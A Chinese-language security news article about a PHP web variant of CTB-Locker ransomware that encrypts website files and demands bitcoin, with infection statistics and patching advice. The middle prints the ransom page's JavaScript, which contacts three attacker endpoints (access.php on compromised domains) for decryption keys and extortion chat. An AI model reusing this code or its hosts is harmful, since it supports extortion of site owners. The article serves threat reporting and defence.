Web版勒索軟件CTB-Locker PHP源碼現身GitHub

勒索軟件CTB-Locker出現其Web演化版本，可感染網頁站點。據分析，其編碼為采用PHP編寫，目前源碼已被托管至GitHub上。

Web版勒索軟件CTB-Locker的首次出現

就在今年西方情人節前夕，英國的一位站長卻有一個不愉快的發現，他查看到其管理的網站頁面遭受篡改，篡改頁面上呈現的信息看起來跟電腦感染惡意勒索軟件的情形相似，其主要信息是讓站點管理員支付比特幣，換取相應目錄文件的解密，以便使站點恢復正常。篡改頁面如下圖，

在被驗證為首次針對網頁的勒索事件后，該事件便得到極大的關注。但其實作為服務器管理員來說，開始都只是希望這僅僅是一次性事件，而不是攻擊者預謀的開端。

在初始階段，實際上并無發現其他感染事件，而情況在過去的一個星期中有了極大的轉變。在這段時間內頻繁出現上述的網頁勒索感染事件。據悉，到目前有超過100個同類型事件被發現。在篡改的信息中其幕后操縱者要求受害者支付0.4個比特幣，并且如在兩天內未完成支付，支付額度將提升至0.8個比特幣。以下為其要求支付比特幣的源碼：

<script>
admins = ["http://orangecountyplasterandstucco.com/access.php", "http://klinika-redwhite.com/access.php", "http://charoenpan.com/access.php"];
iadmin = 0;
domain = encodeURIComponent(window.location.href.replace('http://', '').replace('https://', '').split('/')[0]);

function post_admin(postdata, onsuccess) {
   $.post(admins[iadmin], postdata+"&domain="+domain, function (data) {
         if (data["status"] == "success") {
            onsuccess(data);
         } else {
            alert(data["status"]);
         }
      }, 'json'
   ).fail(function() {
      alert(iadmin >= 2 ? 'It seems like our server is down=( Try to push it again' : 'Push it again');
      iadmin = (iadmin + 1) % 3;
   });
}

$('#decrypt').click(function() {
   post_admin("decrypt=", function(data) {
      alert('Your decryption key is ' + data["decrypt"] + '! Wait while page will be updated!');
      url = window.location.href + (window.location.href.indexOf('?') !== -1 ? '&' : '?');
      window.location.href = url + 'decrypt=' + data["decrypt"] + '&secret=' + data["secret"] + '&dectest=' + data["dectest"];
   });
});

$('#dectest').click(function() {
   post_admin("dectest=&secret="+($("#secret").val()), function(data) {
      alert('Your test decryption key is ' + data["dectest"] + '! Wait while page will be updated!');
      url = window.location.href + (window.location.href.indexOf('?') !== -1 ? '&' : '?');
      window.location.href = url + 'dectest=' + data["dectest"] + '&secret=' + data["secret"];
   });
});

$('#sendmsg').click(function() {
   msg = "&msg=" + encodeURIComponent($("#chatmsg").val());
   post_admin("sendmsg=&secret="+$("#secret").val()+msg, function(data) {
      alert('Thank you for feedback!');
   });
});

$('#recvmsg').click(function() {
   post_admin("recvmsg=&secret="+$("#secret").val(), function(data) {
      $("#chatmsg").val(data["answer"]);
   });
});
   </script>

該勒索程序在勒索支付通知上，跟CTB-Locker為同一模型。但單單從技術上來看，這跟“聲名遠揚”的CTB-Locker勒索軟件的情況不符。因其僅運行于Windows桌面環境，而并無法運行在 Linux Web服務器上。

Web版CTB-Locker采用PHP編寫

來自 Stormshield的安全分析員Benkow，設法分析勒索軟件的運行模式并從一個受感染的對象提取到了源代碼。隨后，Benkow將Web版CTB-Locker 源碼上傳至 KernelMode 論壇上，供其他安全研究人員分析和研究。而Web版CTB-Locker的“知名度”便迅速提升，其源碼也被托管至GitHub。

源代碼地址請點擊： GitHub

考慮到，此前勒索軟件Hidden Tear源碼也托管至GitHub，但事情最終卻沒有朝著有利于用戶的方向進展。而結合當前的情形，可以預見，在接下來的數個月中，將可能出現大規模的針對網頁站點進行的攻擊感染。

而據Benkow的研究分析，Web版CTB-Locker是采用PHP編寫，其中使用高強度的AES-256加密算法。具體可參考 GitHub上的源碼。

感染點目前仍然未知

目前尚未發現該勒索程序如何感染服務器主機的。其中值得注意的是，從統計的情況來看，受感染的主機運行Linux和Windows雙系統，他們中的絕大多數（73%）主機啟用著Exim 服務（SMTP服務器）。Benkow也補充解釋說，

此外，許多感染的站點被發現仍然存在Shellshock漏洞，而該漏洞實際上在一年多以前已經發布了補丁。從統計的情況來看，其中存在較大的問題是大部分站點往往忽略了自身站點的漏洞問題，未能對其進行修復，導致這些漏洞可能被攻擊者所利用。

此前也出現過勒索軟件感染Web服務器事件

在2015年的12月份，安全研究人員發現Linux.Encoder勒索軟件家族已經有了針對Web服務器的功能，據研究分析，Linux.Encoder是采用 C 以及C++進行編寫，而其跟Web版CTB-Locker并無關聯。

結語

在日益嚴峻的安全形勢下，站點的管理員應將自身站點版本更新到最新。同時在可能的情況下，應使用多種掃描工具交叉檢測，對管理的站點進行漏洞掃描，以便及時發現漏洞并進行修復加固。

*參考來源： soft 、 github 、 ker ，FB小編troy編譯，轉載請注明來自FreeBuf黑客與極客（FreeBuf.COM）